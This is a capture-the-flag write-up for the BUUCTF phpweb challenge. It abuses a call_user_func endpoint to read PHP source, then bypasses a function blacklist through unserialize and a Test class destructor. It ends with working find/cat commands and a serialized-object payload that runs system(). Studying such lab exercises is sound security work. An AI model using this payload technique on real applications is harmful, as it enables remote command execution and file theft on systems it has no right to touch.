BUUCTF daily practice - [网鼎杯 2020 朱雀组]phpweb - exploiting deserialization on purpose
Opening the page, you are greeted by Jesus (not really).
Capture the request.
Two parameters are sent. Guess: the first is a function name, the second is that function's argument.
Change them to print_r and test and resend the request.
The output is returned successfully.
Trying system and similar functions here returns "Hacker".
Try to dump the source. After some testing, file_get_contents is the most convenient function for reading files: func=file_get_contents&p=index.php.
This gives the source of index.php:
```php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
```
The blacklist covers most of the command execution functions. Note the Test class: the request-handling logic never uses it, so it is clearly there for us to abuse, and abusing a class in PHP generally means deserialization.
The original logic blacklist-checks only the function name; the parameter $p is never inspected. unserialize is not on the blacklist either.
So set func to unserialize and p to a serialized Test object whose func is "system" and whose p is the command. Test::__destruct calls gettime($this->func, $this->p) directly, with no in_array check, so the command runs as soon as the deserialized object is destroyed (when the script finishes); nothing has to be called by hand, deserializing is enough. Both properties are declared with var (public), so their names appear unmangled in the serialized string.
Listing the web root shows no flag; it is actually under /tmp. If a challenge hides the flag deeper, search for it through the same primitive (quote the glob so the shell does not expand flag* against the current directory, and discard permission errors):
system("find / -name 'flag*' 2>/dev/null"): find every file whose name matches flag*
system("cat $(find / -name 'flag*' 2>/dev/null)"): print every file whose name matches flag*
Final payload (the 22 in s:22 is the byte length of the command string and must be recomputed whenever the command changes, otherwise unserialize fails and the destructor never runs):
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}